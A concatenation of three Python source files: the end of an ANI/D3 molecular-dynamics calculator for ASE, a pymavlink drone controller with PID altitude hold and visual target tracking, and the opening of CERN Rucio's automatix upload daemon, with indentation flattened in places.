                self.nc.setPBC(self.atoms.get_pbc()[0], self.atoms.get_pbc()[1], self.atoms.get_pbc()[2])
                self.Setup = False
            else:
                xyz = self.atoms.get_positions()
                # Set the conformers in NeuroChem
                self.nc.setCoordinates(coords=xyz.astype(np.float32))
            # TODO works only for 3D periodic. For 1,2D - update np.zeros((3,3)) part
            pbc_inv = (np.linalg.inv(self.atoms.get_cell())).astype(np.float32) if atoms.pbc.all() else np.zeros((3, 3),
                                                                                                                 dtype=np.float32)
            self.nc.setCell((self.atoms.get_cell()).astype(np.float32), pbc_inv)
            # ANI energy (atomic units -> eV) plus the D3 correction
            self.results['energy'] = conv_au_ev * self.nc.energy()[0] + energy_d3
            if 'forces' in properties:
                forces = -conv_au_ev * self.nc.force() + forces_d3.T
                # restrain atoms
                for i in self.reslist:
                    forces[i] = 0.0
                self.results['forces'] = forces
            # Voigt order [xx, yy, zz, yz, xz, xy] picked from the 3x3 D3 stress
            self.results['stress'] = conv_au_ev * stress_ani + stress_d3.flat[[0, 4, 8, 5, 2, 1]]

        def __update_neighbors(self):
            # push the ASE neighbor lists into the NeuroChem object
            for a in range(0, len(self.atoms)):
                indices, offsets = self.nlR.get_neighbors(a)
                self.nc.setNeighbors(ind=a, indices=indices.astype(np.int32), offsets=offsets.astype(np.float32))

        def get_atomicenergies(self, atoms=None, properties=['energy'],
                               system_changes=all_changes):
            """Return per-atom ANI energies in eV (self-energies included)."""
            Calculator.calculate(self, atoms, properties, system_changes)
            ## make up for stress
            ## TODO
            stress_ani = np.zeros((1, 3))
            if self.Setup or self.nc.request_setup():
                # Setup molecule for MD
                natoms = len(self.atoms)
                atom_symbols = self.atoms.get_chemical_symbols()
                xyz = self.atoms.get_positions()
                self.nc.setMolecule(coords=xyz.astype(np.float32), types=atom_symbols)
                self.Setup = False
            else:
                xyz = self.atoms.get_positions()
                # Set the conformers in NeuroChem
                self.nc.setCoordinates(coords=xyz.astype(np.float32))
            self.nc.energy()
            return self.nc.aenergies(True) * conv_au_ev
class D3(Calculator):
implemented_properties = ['energy', 'forces', 'stress']
default_parameters = {'xc': 'ani',
'bj': True,
'threebody': True,
'rcut': 95 * Bohr,
'rcutcn': 40 * Bohr,
'rs6': None,
's18': None,
'rs18': None,
's6': None,
'calculator': None}
nolabel = True
def __init__(self, **kwargs):
Calculator.__init__(self, **kwargs)
def calculate(self, atoms=None, properties=['energy'],
system_changes=all_changes):
Calculator.calculate(self, atoms, properties, system_changes)
xc = self.parameters.xc.lower()
bj = self.parameters.bj
threebody = self.parameters.threebody
rcut = self.parameters.rcut
rcutcn = self.parameters.rcutcn
calculator = self.parameters.calculator
if bj:
damp = dampbj
else:
damp = damp0
rs6 = s18 = rs18 = s6 = None
try:
rs6, s18, rs18, s6 = damp[xc]
except KeyError:
unknown_functional = True
else:
unknown_functional = False
if self.parameters.s6 is not None:
s6 = self.parameters.s6
if self.parameters.s18 is not None:
s18 = self.parameters.s18
if self.parameters.rs6 is not None:
rs6 = self.parameters.rs6
if self.parameters.rs18 is not None:
rs18 = self.parameters.rs18
if unknown_functional and None in (s6, s18, rs6, rs18):
raise ValueError("Unknown functional {}! \
Please specify damping parameters.".format(xc))
energy, forces, stress = d3_calc(
self.atoms.get_atomic_numbers(),
self.atoms.get_cell(),
self.atoms.get_positions().T,
rcut=rcut,
rcutcn=rcutcn,
s6=s6,
s18=s18,
rs6=rs6,
rs18=rs18,
alp6=alp,
alp8=alp + 2,
pbc=self.atoms.get_pbc(),
bj=bj,
threebody=threebody)
self.results['energy'] = energy
self.results['forces'] = forces.T
self.results['stress'] = stress.flat[[0, 4, 8, 5, 2, 1]]
if calculator is not None:
calculate(self.atoms)
self.results['energy'] += calculator.results['energy']
self.results['forces'] += calculator.results['forces']
self.results['stress'] += calculator.results['stress']
|
Drone.py | import time
from pymavlink import mavutil
import matplotlib.pyplot as plt
import threading
import math
from pynput import keyboard
import os
from src.dronevision_library import visual_algorithm
import numpy
class Drone:
    def __init__(self, connection_string, alt_type="barometer", scantime=0, color='white'):
        """Connect to the vehicle and start the worker threads.

        Parameters:
            connection_string (str): pymavlink connection string (serial port / UDP endpoint)
            alt_type (str): altitude source - "barometer", "sonar" or "gps"
            scantime (float): scan duration forwarded to the vision algorithm
            color (str): target color forwarded to the vision algorithm
        """
        print("Connecting...")
        try:
            self.vehicle = mavutil.mavlink_connection(connection_string, force_connected=True, baud=57600)
            self.vehicle.wait_heartbeat()
            print("Successfully connected to system", self.vehicle.target_system)
        except TimeoutError:
            print("Failed to connect")
            self.interrupt()
        self.lock = threading.Lock()
        self.commands = {}
        self.controller = Controller(self)
        # command name -> callable, used by the multiplexer thread
        self.functions = {'set_throttle': self.set_throttle, 'set_mode': self.set_mode,
                          'recv_msg': self.recv_msg, 'param_request_read': self.param_request_read,
                          'manual_control': self.controller.manual_control}
        self.output = {}
        self.execute(func=self.multiplexer, args=(), daemon=True)
        self.execute(func=self.read_message, args=(), daemon=True)
        # waits until the script starts receiving messages
        # NOTE(review): self.heartbeat is created inside read_message's
        # thread; if this check runs before that thread initializes its
        # buffers it raises AttributeError - confirm.
        while not self.heartbeat:
            time.sleep(0.1)
        self.hold_alt = False
        self.alt_hold_throttle = 50
        self.target = []
        self.scan = False
        self.start_pressure = 0
        self.alt_type = alt_type
        self.flightmode = self.get_mode(1)
        self.disable_gps()
        self.execute(func=self.alt_hold, args=(), daemon=True)
        self.execute(func=self.get_target, args=(scantime, color), daemon=True)
        self.hover_throttle = None
def arm(self):
"""Arms the drone."""
self.controller.load_parameters()
self.hover_throttle = self.get_parameter(b'MOT_THST_HOVER', 1)['param_value']
#Sets the mode to stabilize before arming since the drone is not armable in some modes
self.mode('STABILIZE', 10)
self.vehicle.arducopter_arm()
print("Arming drone...")
#Wait for the drone to be armed
while True:
if self.armed:
break
time.sleep(0.5)
print("Drone is armed")
@property
def armed(self):
"""Returns whether the drone is armed or not."""
heartbeat = self.heartbeat[-1]
if heartbeat['base_mode'] == 209:
return True
elif heartbeat['base_mode'] == 81:
return False
else:
print("Unknown state")
def disarm(self):
"""Disarms the drone. Can only be done when not airborne."""
time.sleep(1)
while True:
self.vehicle.arducopter_disarm()
if not self.armed:
break
time.sleep(0.5)
    def arm_and_takeoff(self, alt):
        """Arm the drone, then climb to the requested altitude.

        Parameters:
            alt (float): target altitude forwarded to change_alt
        """
        self.arm()
        # PID gains/limits tuned for takeoff
        self.change_alt(alt, kp=15, ki=4, kd=0, l_limit=30, u_limit=70)
        print("Altitude reached")
    def disable_gps(self):
        """Changes certain parameters to disable the usage of the gps."""
        self.vehicle.param_set_send('ATT_ACC_COMP', 0, mavutil.mavlink.MAVLINK_TYPE_INT32_T)
        self.vehicle.param_set_send('ATT_MAG_DECL_A', 0, mavutil.mavlink.MAVLINK_TYPE_INT32_T)
        # NOTE(review): the denormal float below is the bit pattern of the
        # int32 value 4 reinterpreted as float32 (MAVLink params travel as
        # floats) - presumably sets EKF2_AID_MASK to 4; confirm.
        self.vehicle.param_set_send('EKF2_AID_MASK', 5.60519385729926828369491833316E-45,
                                    mavutil.mavlink.MAVLINK_TYPE_INT32_T)
def mode(self, flightmode, priority):
"""Changes the flightmode of the drone."""
print("Setting flightmode...")
self.multiplexer_add('set_mode', param1=flightmode, priority=priority)
while self.flightmode != ('COPTER_MODE_' + flightmode):
time.sleep(0.2)
self.flightmode = self.get_mode(1)
    def set_mode(self, flightmode):
        """Sends the command to change the flightmode.

        Thin wrapper invoked by the multiplexer; `flightmode` is the mode
        name (e.g. 'STABILIZE').
        """
        self.vehicle.set_mode(flightmode)
    def get_mode(self, priority):
        """Return the current flightmode name (e.g. 'COPTER_MODE_STABILIZE').

        The `priority` argument is accepted for interface consistency with
        the other getters but is not used here.
        """
        heartbeat = self.heartbeat[-1]
        custom_mode = heartbeat['custom_mode']
        return mavutil.mavlink.enums['COPTER_MODE'][custom_mode].name
    def ack_command(self, priority):
        """Provides feedback about the command that was sent.

        Blocks until a COMMAND_ACK message arrives, then returns the
        human-readable MAV_RESULT description: the command was received and
        executed, received but still waiting to execute, or was not
        executed.
        """
        ack_msg = self.get_message('COMMAND_ACK', True, priority=priority)
        return mavutil.mavlink.enums['MAV_RESULT'][ack_msg['result']].description
def baro_altitude(self, priority):
"""Returns the altitude of the drone based on the barometer."""
# sets the pressure of the initial position if it has not been done before
if self.start_pressure == 0:
self.start_pressure = self.get_pressure(priority)
# calculates the pressure using the formula used by ArduPilot itself
# see https://discuss.ardupilot.org/t/estimating-gps-vs-baro-height-some-thoughts/25952/5 for more information
pressure = self.get_pressure(priority)
scaling = pressure / self.start_pressure
temp = 293.15
altitude = 153.8462 * temp * (1.0 - math.exp(0.190259 * math.log(scaling)))
return altitude
    def get_pressure(self, priority):
        """Return the absolute pressure from the latest SCALED_PRESSURE message.

        The `priority` argument is accepted for interface consistency but is
        not used here.
        """
        scaled_pressure = self.scaled_pressure[-1]
        return scaled_pressure['press_abs']
def get_message(self, msg, blocking, priority=0):
"""Sends commands to request messages from the drone."""
message = self.recv_msg(msg, blocking)
message = message.to_dict()
return message
def read_message(self):
"""Reads every message sent by the drone and stores it in the corresponding list."""
# Defining all the required lists
self.heartbeat = []
self.attitude = []
self.scaled_pressure = []
self.gps_raw_int = []
self.param_value = []
self.scaled_imu2 = []
self.servo_output_raw = []
self.ack_comm = []
self.local_position_ned = []
self.rc_channels = []
while True:
message = self.vehicle.recv_match()
if not message:
continue
# checks which message it received and adds it to the corresponding list
if message.name == 'HEARTBEAT':
self.heartbeat.append(message.to_dict())
elif message.name == 'ATTITUDE':
self.attitude.append(message.to_dict())
elif message.name == 'SCALED_PRESSURE':
self.scaled_pressure.append(message.to_dict())
elif message.name == 'GPS_RAW_INT':
self.gps_raw_int.append(message.to_dict())
elif message.name == 'PARAM_VALUE':
self.param_value.append(message.to_dict())
elif message.name == 'SCALED_IMU2':
self.scaled_imu2.append(message.to_dict())
elif message.name == 'SERVO_OUTPUT_RAW':
self.servo_output_raw.append(message.to_dict())
elif message.name == 'ACK_COMMAND':
self.ack_comm.append(message.to_dict())
elif message.name == 'LOCAL_POSITION_NED':
self.local_position_ned.append(message.to_dict())
elif message.name == 'RC_CHANNELS':
self.rc_channels.append(message.to_dict())
    def change_alt(self, alt, kp=1, ki=1, kd=1, l_limit=40, u_limit=60, epsilon=0.05, debug=False):
        """Commands the drone to fly to the desired altitude without GPS.

        A PID controller converts the altitude error into a throttle
        percentage; once the altitude has stayed within +-epsilon of the
        target for long enough, altitude hold takes over and the method
        returns.

        Parameters:
            alt (float): target altitude
            kp (int): proportional gain
            ki (int): integral gain
            kd (int): derivative gain
            l_limit (float): minimum output value of the PID
            u_limit (float): maximum output value of the PID
            epsilon (float): allowed error for the altitude
            debug (bool): True to print and plot output for debugging
        """
        timer = 0
        # variables for plotting
        height = []
        setpoint = []
        time_l = []
        p_l = []
        i_l = []
        d_l = []
        thr_l = []
        start_time = time.monotonic()
        pid = PID(kp, ki, kd, setpoint=alt, output_limits=(l_limit, u_limit))
        self.mode('ALT_HOLD', 10)
        while True:
            # calculate and request a new throttle setting
            curr_alt = self.get_altitude(2) #/1000
            throttle = pid(curr_alt)
            self.set_throttle(throttle, priority=5)
            # used for debugging
            if debug:
                time_l.append(time.monotonic() - start_time)
                p, i, d = pid.components
                height.append(curr_alt)
                setpoint.append(alt)
                p_l.append(p)
                i_l.append(i)
                d_l.append(d)
                thr_l.append(throttle)
            # the drone holds its altitude after staying around the target altitude for a certain amount of time
            if alt - epsilon < curr_alt < alt + epsilon:
                timer += 1
                # 3 * (0.1 / 0.01) = 30 consecutive in-band iterations
                if timer == 3 * (0.1 / 0.01):
                    # hold throttle depends on the active flightmode
                    if self.flightmode == 'COPTER_MODE_STABILIZE':
                        self.alt_hold_throttle = self.hover_throttle
                    elif self.flightmode =='COPTER_MODE_ALT_HOLD':
                        self.alt_hold_throttle = 50
                    self.hold_alt = True
                    break
            else:
                timer = 0
        # used for debugging
        if debug:
            # Plot the altitude in function of time
            plt.figure(1)
            plt.plot(time_l, height)
            plt.plot(time_l, setpoint, "r--")
            plt.xlabel("time [s]")
            plt.ylabel("height [m]")
            plt.title("takeoff behaviour")
            # Plot the output from the PID in function of time
            plt.figure(2)
            plt.plot(time_l, p_l, color="red", label="Proportional")
            plt.plot(time_l, i_l, color="green", label="Integral")
            plt.plot(time_l, d_l, color="blue", label="Differential")
            plt.plot(time_l, thr_l, color="black", label="Throttle")
            plt.legend()
            plt.xlabel("time [s]")
            plt.ylabel("Throttle [%]")
            plt.title("PID behaviour")
            plt.show()
    def set_throttle(self, throttle, priority):
        """Requests the desired throttle setting.

        Parameters:
            throttle (float): throttle setting in %
            priority (int): multiplexer priority of the request
        """
        self.controller.throttle = throttle
        # Controller instances are callable; presumably this pushes the new
        # setting to the vehicle at the given priority - Controller is
        # defined elsewhere, confirm.
        self.controller(priority=priority)
def multiplexer(self):
"""Selects which command to send to the drone based on priority."""
while True:
with self.lock:
no_commands = len(self.commands)
# starts looping as soon as a command is requested
if no_commands > 0:
# determine the command with the highest priority
next_prio = 0
next_command = None
commands = self.commands
for c in commands:
if commands[c][0] > next_prio:
next_prio = commands[c][0]
next_command = c
if next_command is not None:
p = commands[next_command]
if next_prio != 0:
# in case of a command requesting output from the drone, the output is saved to an attribute
if next_command == "recv_msg":
msg = self.functions[next_command](p[1], p[2])
if msg is not None:
self.output[p[1]] = msg
else:
# determines the number of parameters of the command
no_param = 0
while p[no_param] is not None:
no_param += 1
no_param -= 1 # subtract 1 since the priority is not a relevant parameter
# executes the command based on the number of parameters
if no_param == 0:
self.functions[next_command]()
elif no_param == 1:
self.functions[next_command](p[1])
elif no_param == 2:
self.functions[next_command](p[1], p[2])
elif no_param == 3:
self.functions[next_command](p[1], p[2], p[3])
elif no_param == 4:
self.functions[next_command](p[1], p[2], p[3], p[4])
elif no_param == 5:
self.functions[next_command](p[1], p[2], p[3], p[4], p[5])
elif no_param == 6:
self.functions[next_command](p[1], p[2], p[3], p[4], p[5], p[6])
self.commands[next_command][0] = 0 # sets the priority of the executed command to 0
# increments the priority of every requested command, to prevent commands with a high priority
# to only be executed
for command in self.commands:
if self.commands[command][0] != 0:
self.commands[command][0] += 1
def multiplexer_add(self, comm, param1=None, param2=None, param3=None, param4=None, param5=None, param6=None,
priority=0):
"""Adds the requested command to the commands dictionary."""
with self.lock:
# the order of the parameters must be identical to the order of the arguments of the requested function
self.commands[comm] = [priority, param1, param2, param3, param4, param5, param6]
@staticmethod
def execute(func, args, daemon=False):
""""Executes the function in a new thread.
Parameters:
func (function): the function to be run in the new thread
args (tuple): contains the required arguments
daemon (bool): determines whether the program waits for the completion of the thread before finishing
or not, false or true respectively
"""
thread = threading.Thread(target=func, args=args, daemon=daemon)
thread.start()
    def get_parameter(self, parameter, priority):
        """Returns the requested parameter.

        Queues a PARAM_REQUEST_READ through the multiplexer and blocks
        until a PARAM_VALUE message arrives.

        Parameters:
            parameter (bytes): parameter id, e.g. b'MOT_THST_HOVER'
            priority (int): multiplexer priority of the request
        """
        self.multiplexer_add('param_request_read', parameter, priority=priority)
        return self.get_message('PARAM_VALUE', True, priority=priority)
    def param_request_read(self, parameter):
        """Sends a request to the drone to send the information of a parameter.

        The trailing -1 presumably selects lookup by parameter name rather
        than by index (MAVLink PARAM_REQUEST_READ convention) - confirm.
        """
        self.vehicle.mav.param_request_read_send(self.vehicle.target_system, self.vehicle.target_component, parameter,
                                                 -1)
def land(self, throttle_decrement=5):
""""Causes the drone to land without GPS."""
self.hold_alt = True
if self.flightmode == 'COPTER_MODE_STABILIZE':
self.alt_hold_throttle = self.hover_throttle - throttle_decrement
elif self.flightmode == 'COPTER_MODE_ALT_HOLD':
self.alt_hold_throttle = 50 - throttle_decrement
az = []
start_time = time.monotonic()
while True:
# reads and stores the vertical acceleration
imu = self.scaled_imu2[-1]
az.append(imu['zacc'])
# when a spike in acceleration is measured, the drone has touched the ground and the drone can disarm
if az[-1] < -1010:
break
self.hold_alt = False
    def recv_msg(self, msg_type, blocking):
        """Receive a message from the drone.

        Presumably returns None when blocking is False and no message of
        msg_type is queued (pymavlink recv_match semantics) - confirm.
        """
        return self.vehicle.recv_match(type=msg_type, blocking=blocking)
    def alt_hold(self):
        """Repeatedly sends commands to hold altitude.

        Runs forever in its own thread; only active while self.hold_alt is
        True.
        """
        while True:
            if self.hold_alt:
                # NOTE(review): no sleep in this branch, so throttle commands
                # are issued in a tight spin loop - confirm that is intended.
                self.set_throttle(self.alt_hold_throttle, priority=1)
            else:
                time.sleep(0.5)
    def sonar_altitude(self, priority):
        """Returns the altitude measured by the sonar, assuming the sonar is pointing downwards.

        NOTE(review): self.distance_sensor is never populated by
        read_message() in this file, so this raises AttributeError unless a
        DISTANCE_SENSOR buffer is added elsewhere - confirm.
        """
        distance_sensor = self.distance_sensor[-1]
        return distance_sensor['current_distance']
    def gps_altitude(self, priority):
        """Returns the altitude based on the GPS.

        NOTE(review): LOCAL_POSITION_NED's z axis points down, so this value
        is presumably negative above the home point - confirm how callers
        handle the sign.
        """
        local_position = self.local_position_ned[-1]
        return local_position['z']
def get_altitude(self, priority):
"""Returns the altitude.
The type of sensor used to measure altitude is defined when creating a Drone object.
"""
if self.alt_type.lower() == "barometer":
return self.baro_altitude(priority)
elif self.alt_type.lower() == "sonar":
return self.sonar_altitude(priority)
elif self.alt_type.lower() == "gps":
return self.gps_altitude(priority)
else:
print("Invalid method of measuring altitude")
    def get_target(self, scantime, color, debug=False, source=''):
        """Stores the current distance and the current angle relative to the drone.

        Runs forever in its own thread; only scans while self.scan is True.

        Parameters:
            scantime (float): the time to scan for objects after which it returns the output
            color (str): the color to be detected
            debug (bool): True will show white bounding around detected object every 2 seconds
            source (str): the source image
        """
        # when enabled, will continuously detect the object
        while True:
            if self.scan:
                # NOTE(review): `safezonesize` is not defined anywhere in
                # this file - this raises NameError once scanning starts;
                # confirm it is meant to be a module-level constant.
                distance, angle = visual_algorithm(scantime, safezonesize, color, debug, source)
                self.target.append((distance, angle))
            else:
                time.sleep(0.5)
def yaw_to_target(self, angle):
    """Rotate the drone so the target lines up with its pitch or roll axis.

    The drone rotates so it can either fly towards the target by pitching
    (``_x_target`` True) or by rolling (``_x_target`` False), whichever
    requires the least amount of rotation.

    Parameters:
        angle (float): the target's bearing relative to the drone, in
            degrees within [-180, 180]

    Bug fix: the original third branch tested ``135 <= angle <= -135``,
    which is never true, so bearings beyond +/-135 degrees caused no
    rotation at all. It now matches both sides of the rear sector and
    rotates through the smaller arc.
    """
    # checks in which quadrant the target is located and rotates accordingly
    if -45 <= angle <= 45:
        # target roughly ahead: align with the pitch axis
        self.yaw(angle)
        self._x_target = True
    elif 45 < angle < 135:
        # target to the right: align with the roll axis
        self.yaw(90 - angle)
        self._x_target = False
    elif angle >= 135 or angle <= -135:
        # target roughly behind: align with the pitch axis, turning the
        # shorter way round on either side
        self.yaw(180 - angle if angle >= 0 else -180 - angle)
        self._x_target = True
    elif -135 < angle < -45:
        # target to the left: align with the roll axis
        self.yaw(-90 - angle)
        self._x_target = False
def go_to_target(self, kp, f = 0.05, p_w = 1*10**-6, p_h = 1*10**-6):
    """Commands the drone to fly towards the detected target.

    Based on Image Based Visual Servoing (IBVS): the pixel error of the
    target is mapped through the pseudo-inverse of the image jacobian to a
    velocity, which is then scaled into an attitude command. Runs forever;
    relies on ``self.target`` being kept up to date by the scanning thread.

    Parameters:
        kp (int): proportional term
        f (float): focal distance of the camera
        p_w (float): pixel width
        p_h (float): pixel height
    """
    # altitude is sampled once up front and treated as constant afterwards
    z = self.get_altitude(2)
    # first rotate so the target lies on the pitch or roll axis
    self.yaw_to_target(self.target[-1][1])
    # continously calculates the required angle needed to fly towards the target
    while True:
        u = 0
        v = 0
        pe = []
        # checks whether the target is aligned along the roll or pitch axis, respectively
        if self._x_target:
            u = self.target[-1][0]
            pe = [[-u], [0]]
        elif not self._x_target:
            v = self.target[-1][0]
            pe = [[0],[-v]]
        # jacobian matrix relating camera motion to image-plane motion
        jp = [[-f/(p_w * z), 0, u/z, (p_w * u * v)/f, -(f**2 + (p_w*u)**2) / (p_w*f), v],
              [0, -f/(p_h * z), 0, 0, -(p_h * u * v) / f, -u]]
        i_jp = numpy.linalg.pinv(jp) # inverse of the jacobian matrix
        velocity = kp * numpy.dot(i_jp, pe)
        # empirically scaled mapping from velocity to attitude angle — TODO confirm the 4000 factor
        angle = 4000 * velocity
        if self._x_target:
            self.pitch(angle[0][0])
        elif not self._x_target:
            self.roll(angle[1][0])
def interrupt(self):
    """Start a keyboard listener acting as a killswitch for drone and script.

    Pressing 'k' sends a MAVLink flight-termination command to the vehicle
    and then terminates the whole process immediately.
    """
    def on_press(key):
        # only the 'k' key triggers the killswitch
        if key != keyboard.KeyCode.from_char('k'):
            return
        self.vehicle.mav.command_long_send(self.vehicle.target_system, self.vehicle.target_component,
                                           mavutil.mavlink.MAV_CMD_DO_FLIGHTTERMINATION, 0, 1, 0, 0, 0, 0, 0, 0)
        os._exit(1)

    keyboard.Listener(on_press=on_press).start()
def pitch(self, angle):
    """Commands the drone to pitch to the desired angle (degrees).

    Only records the setpoint on the controller; the controller sends it
    with the next manual-control request.
    """
    self.controller.pitch = angle
def roll(self, angle):
    """Commands the drone to roll to the desired angle (degrees).

    Only records the setpoint on the controller; the controller sends it
    with the next manual-control request.
    """
    self.controller.roll = angle
def yaw(self, angle):
    """Commands the drone to yaw to the desired angle relative to its
    current heading, then blocks until the rotation has completed.

    Parameters:
        angle (float): heading change in degrees
    """
    self.controller.yaw = angle
    # waits until the drone has reached its correct heading; the initial
    # sleep gives the controller time to pick up the request and set
    # `rotating` before the first check
    while True:
        time.sleep(0.5)
        if not self.controller.rotating:
            break
class Controller():
    """Translates desired attitude/throttle settings into manual-control
    requests for the drone."""

    def __init__(self, drone):
        # link back to the owning drone; all requests are routed through it
        self.drone = drone
        # desired state, updated by the drone's movement methods
        self.throttle = 0
        self.pitch = 0
        self.roll = 0
        self.yaw = 0
        self.rotating = False  # True while a commanded rotation is in progress
        self.error = 0  # last heading error in degrees
        self._timer = 0  # consecutive in-margin samples while settling a rotation

    def __call__(self, priority=1):
        """Queue a manual-control request built from the current attitude and
        throttle settings."""
        # a yaw rate is only needed when a new heading was requested or a
        # rotation is still ongoing
        rate = self.yaw_rate(self.yaw) if (self.yaw != 0 or self.rotating) else 0
        self.drone.multiplexer_add('manual_control', self.pitch, self.roll, self.throttle, int(rate), priority=priority)

    def load_parameters(self):
        """Fetch the vehicle parameters the controller depends on."""
        # ANGLE_MAX is reported in centidegrees; convert to degrees
        self.angle_max = (self.drone.get_parameter(b'ANGLE_MAX', 1)['param_value'] / 100)
        self.yaw_p = 15  # proportional gain for the yaw controller

    def manual_control(self, pitch=0, roll=0, throttle=0, yaw=0, buttons=0):
        """Send the desired pitch, roll, yaw rate and throttle to the drone."""
        # normalise angles into the MAVLink [-1000, 1000] range; throttle is
        # given in percent
        scaled_pitch = int((pitch / self.angle_max) * 1000)
        scaled_roll = int((roll / self.angle_max) * 1000)
        scaled_throttle = int((throttle / 100) * 1000)
        self.drone.vehicle.mav.manual_control_send(self.drone.vehicle.target_system, scaled_pitch, scaled_roll, scaled_throttle, yaw, buttons)

    def yaw_rate(self, yaw):
        """Return the proportional yaw rate needed to reach the requested
        heading change *yaw* (degrees)."""
        heading = self.drone.attitude[-1]['yaw'] * (180 / math.pi)
        if yaw != 0:
            # a new rotation was requested: fix the target heading, consume
            # the request and mark the rotation as active
            self._des_hdg_deg = heading + yaw
            self.yaw = 0
            self.rotating = True
        self.error = self._des_hdg_deg - heading
        # the rotation counts as finished once the error stays within +/-5
        # degrees for 50 consecutive samples
        if -5 < self.error < 5:
            self._timer += 1
            if self._timer == 50:
                self.rotating = False
                self._timer = 0
        else:
            self._timer = 0
        return self.yaw_p * self.error
class PID(object):
    """Simple proportional-integral-derivative controller."""

    def __init__(self, Kp=1.0, Ki=0.0, Kd=0.0, setpoint=0, sample_time=0.01, output_limits=(None, None)):
        self.Kp, self.Ki, self.Kd = Kp, Ki, Kd
        self.setpoint = setpoint
        self.sample_time = sample_time
        self._min_output, self._max_output = output_limits

    def __call__(self, input_):
        """
        Update the controller with *input_* and return a new control output if
        at least sample_time seconds have passed since the last update.
        Otherwise return the previous output (or None if no output has been
        computed yet).
        """
        now = time.monotonic()
        # on the very first update there is no previous timestamp: use a tiny
        # dt so the integral contribution is negligible
        last_time = getattr(self, '_last_time', None)
        dt = (now - last_time) if last_time is not None else 1e-16
        last_output = getattr(self, '_last_output', None)
        if self.sample_time is not None and dt < self.sample_time and last_output is not None:
            # only update every sample_time seconds
            return last_output
        # error terms
        error = self.setpoint - input_
        last_input = getattr(self, '_last_input', None)
        d_input = (input_ - last_input) if last_input is not None else 0
        # proportional term
        self._proportional = self.Kp * error
        # integral term, clamped to the output limits to avoid windup
        self._integral = getattr(self, '_integral', 0) + self.Ki * error * dt
        self._integral = self.clamp(self._integral, self.output_limits)
        # derivative on measurement (avoids derivative kick on setpoint change)
        self._derivative = -self.Kd * d_input / dt
        # final output
        output = self.clamp(self._proportional + self._integral + self._derivative, self.output_limits)
        # remember state for the next update
        self._last_output = output
        self._last_input = input_
        self._last_time = now
        return output

    def clamp(self, value, limits):
        """Clamp *value* into [lower, upper]; a None bound is ignored and a
        None value passes straight through."""
        lower, upper = limits
        if value is None:
            return None
        if upper is not None and value > upper:
            return upper
        if lower is not None and value < lower:
            return lower
        return value

    @property
    def components(self):
        """
        The P-, I- and D-terms from the last computation as a tuple. Useful
        for visualizing what the controller is doing or when tuning
        hard-to-tune systems.
        """
        return self._proportional, self._integral, self._derivative

    @property
    def output_limits(self):
        """
        The current output limits as a 2-tuple: (lower, upper). See also the
        *output_limits* parameter in :meth:`PID.__init__`.
        """
        return self._min_output, self._max_output
|
automatix.py | # -*- coding: utf-8 -*-
# Copyright 2018-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Mario Lassnig <mario.lassnig@cern.ch>, 2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - Brandon White <bjwhite@fnal.gov>, 2019
# - Cedric Serfon <cedric.serfon@cern.ch>, 2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020-2021
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
from __future__ import division
import logging
import random
import socket
import tempfile
import threading
from datetime import datetime
from json import load
from math import exp
from os import remove, rmdir, stat, getpid
from time import sleep, time
import rucio.db.sqla.util
from rucio.client import Client
from rucio.common import exception
from rucio.common.exception import FileReplicaAlreadyExists, ConfigNotFound
from rucio.common.logging import formatted_logger, setup_logging
from rucio.common.types import InternalScope
from rucio.common.utils import adler32, daemon_sleep
from rucio.common.utils import execute, generate_uuid
from rucio.core import monitor, heartbeat
from rucio.core.config import get
from rucio.core.scope import list_scopes
from rucio.rse import rsemanager as rsemgr
SUCCESS = 0
FAILURE = 1
GRACEFUL_STOP = threading.Event()
def upload(files, scope, metadata, rse, account, source_dir, dataset_lifetime, did=None, set_metadata=False, logger=logging.log):
    """Physically upload files to an RSE and register them in Rucio.

    Parameters:
        files: list of file names (LFNs) to upload.
        scope: scope the files are registered under.
        metadata: metadata attached to the created dataset when *set_metadata* is true.
        rse: name of the RSE to upload to.
        account: account used for the replication rules.
        source_dir: local directory holding the files.
        dataset_lifetime: lifetime (seconds) of the created dataset, or None.
        did: optional 'scope:name' of a dataset to create and attach the files to.
        set_metadata: when True, attach *metadata* to the created dataset.
        logger: logging callable with the signature of ``logging.log``.

    Returns:
        True when upload and registration succeeded, False otherwise (any
        leftovers are removed from the storage on failure).
    """
    logger(logging.DEBUG, 'In upload')
    dsn = None
    if did:
        dsn = {'scope': did.split(':')[0], 'name': did.split(':')[1]}
    client = Client()
    # build the registration payload (list_files) and the physical upload
    # descriptions (lfns) for every file
    list_files = []
    lfns = []
    for filename in files:
        physical_fname = filename
        # slashes are stripped out of the on-disk name
        if physical_fname.find('/') > -1:
            physical_fname = "".join(filename.split('/'))
        fullpath = '%s/%s' % (source_dir, physical_fname)
        size = stat(fullpath).st_size
        checksum = adler32(fullpath)
        logger(logging.INFO, 'File %s : Size %s , adler32 %s', fullpath, str(size), checksum)
        list_files.append({'scope': scope, 'name': filename, 'bytes': size, 'adler32': checksum, 'meta': {'guid': generate_uuid()}})
        lfns.append({'name': filename, 'scope': scope, 'filesize': size, 'adler32': checksum, 'filename': physical_fname})
    # Physical upload
    logger(logging.INFO, 'Uploading physically the files %s on %s', str(lfns), rse)
    rse_info = rsemgr.get_rse_info(rse, vo=client.vo)
    try:
        success_upload = True
        # up to 3 attempts with exponential backoff between retries.
        # NOTE(review): success_upload is never reset to True between
        # attempts, so a single failed attempt marks the whole upload as
        # failed even if a later retry succeeds — confirm this is intended.
        for cnt in range(0, 3):
            rows = rsemgr.upload(rse_info, lfns=lfns, source_dir=source_dir, logger=logger)
            # temporary hack
            global_status, ret = rows['success'], rows[1]
            logger(logging.INFO, 'Returned global status : %s, Returned : %s', str(global_status), str(ret))
            if not global_status:
                for item in ret:
